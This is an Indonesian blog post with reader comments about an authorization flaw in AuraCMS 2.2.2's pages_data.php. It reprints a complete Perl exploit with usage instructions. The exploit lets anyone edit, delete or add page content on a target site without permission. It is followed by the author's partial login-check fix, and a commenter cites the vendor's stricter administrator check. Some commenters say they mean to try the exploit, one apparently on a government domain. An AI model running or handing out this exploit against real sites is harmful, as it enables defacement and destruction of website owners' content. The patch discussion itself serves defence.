| Bug in AuraCMS 2.2.2 |
| 11-07-2008 - Oleh : admin |    |
gara - garanya itu ikut - ikutan temen - temenku (ketularan nakal) itu mungkin tepatnya :) . Gimana tidak lawong konco2 kabeh iku podo iso ngehack (itu bahasa gaul komunitas bawah tanah Huekwkwkwkwkwkw) lah dalah kok ya ternyata asyik n jadi ketularan deehh....:p awalnya iseng - iseng akhirnya coba - coba lalu Tiiiiitttt sensorr OK langsung ke pokok permasalahan, berikut exploit yang dibikin oleh Om k1tk4t : use LWP::UserAgent; use HTTP::Cookies; use Getopt::Long; if ( !$ARGV[1] ) { print "\n ///////////////////////////////////////////////////////////"; print "\n // ..::> k1tk4t <::.. //"; print "\n // AuraCMS <= 2.2.2 (pages_data.php) //"; print "\n // Arbitrary Edit/Add/Delete data halaman exploit //"; print "\n ///////////////////////////////////////////////////////////"; print "\n[!] "; print "\n[!] Penggunaan : perl auracms_pagesdata.pl [Site] [Path] [id_halaman] [options]"; print "\n[!] Contoh : perl auracms_pagesdata.pl localhost /toko/ 1 -o 1"; print "\n[!] Options : 1=Edit , 2=Delete, 3=Add"; print "\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $idhalaman = $ARGV[2]; my $isijudul = "Auracms"; my $isikonten = "Mohon Perhatian!!! terdapat kutu pada berkas pages_data.php, Arbitrary Edit-Add-Delete data halaman"; my $ambilkue = "http://".$host.$path."index.php"; my $browser = LWP::UserAgent->new; my $kue = HTTP::Cookies->new(); my $hasil = ""; %options = (); GetOptions(\%options, "o=i",); if($options{"o"} && $options{"o"} == 1) { $arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=edit_saved&id="; } if($options{"o"} && $options{"o"} == 2) { $arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=delete&id="; } if($options{"o"} && $options{"o"} == 3) { $arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=add&id="; } $hasil = $browser->get($arbitrary); if(!$hasil->is_success) { die("[!] Gagal, berkas pages_data.php tidak tersedia\n"); } # ambil kue dari website $hasil = $browser->get($ambilkue); $kue->extract_cookies($hasil); $browser->cookie_jar($kue); # arbitrary exploit $arbitrary .= $idhalaman; $hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],); $konten = $hasil->content; print $konten ; simpan dengan nama aura.pl untuk contoh penggunaannya sudah di tulis sama si pembuatnya tinggal jalankan $ perl /patch/aura.pl akan muncul seperti pada gambar  Sampai saat sampean membaca Artikel ini, saya masih belum mencoba di internet melainkan saya mencobanya di komputer local, Kenapa? karena saya sudah pernah merasakan bagaimana Jengkelnya ketika Website yg sudah susah payah kita bangun dikerjain ma seseorang :(. Sekedar saran saja lebih baik sampean coba pada komputer local. berikut saya sertakan gambar yg telah di ubah oleh seseorang, Sumpah bukan Gue berani samber geledek deeh....  perbaikian yang saya lakukan ------------------------------ Copy Code --------------------------- if(!cek_login()){ echo "Maaf anda tidak diperkenankan mengakses halaman ini"; }else{ -------------------------- end code --------------------------------- copy kan code diatas di atas code switch (@$_GET['action']){ lalu pada akhir halaman sebelum ?> (akhir TAG untuk php) beri tanda }} untuk menutup code yg sudah di copy tadi. di update tgl 14-7-2008 semoga bisa membantu. |
| Komentar Pengunjung |
| keren 11:56, 13-07-2008 - Oleh : n0c0py hhmm.... pertama baca exploit k1tk4t di milw0rm /me juga kaget setengah modarr!!! pasalnya /me juga pake AuraCMS 2.2.2... hhh... untung patch duluan sebelom kena hack (and my lovely PHPids) heheee.... hmm... patch yg ente kasih bagus juga :D tapi dengan hanya melihat sudah login atau belum: if(!cek_login()){ ..... } tidak menyelesaikan masalah, karena setiap user(tanpa previllage admin) yang udah login dapat melakukan exploitasi.... Admin AuraCMS pun bagus sekali, sudah menyiapkan patch: if (!cek_login ()){ echo'<div class="error">You Must Login First If Not Yet Have Account Please Register</div>'; }else{ if (session_is_registered ('LevelAkses') && $_SESSION['LevelAkses']=="Administrator"){ ..... } disitu ada pengecekan previllage-nya yahh... beda2 dikit laah.. tapi bahaya brotha! ^^v thx for sharing CMIIW |
| waduh iyo lali copy 20:39, 13-07-2008 - Oleh : qu4ck haa.... lupa kalo Aura ada Hak level na hiiiii.... Maaf untuk semuanya ya..... abies kebiasaan bikin dewe Levelnya yg atur sqlnya, via function sql hee...... manusiakan ada kesalahan bro... |
| Perlu 6:21, 15-07-2008 - Oleh : t3tuk0 wah perlu di coba tuh....... keren2 |
| serang go id 11:26, 15-02-2010 - Oleh : serang Thank Bro.. Coba dolo |
| auracms_pagesdata.pl 17:18, 13-05-2010 - Oleh : korban hack auracms ini kenapa mas kok ada komentar . Can't open perl script "auracms_pagesdata.pl": No such file or directory thx |
| Auracms 15:45, 15-05-2010 - Oleh : qu4ck Kemungkinan sudah di Path oleh yg punya website |
| Formulir Pengisian Komentar |
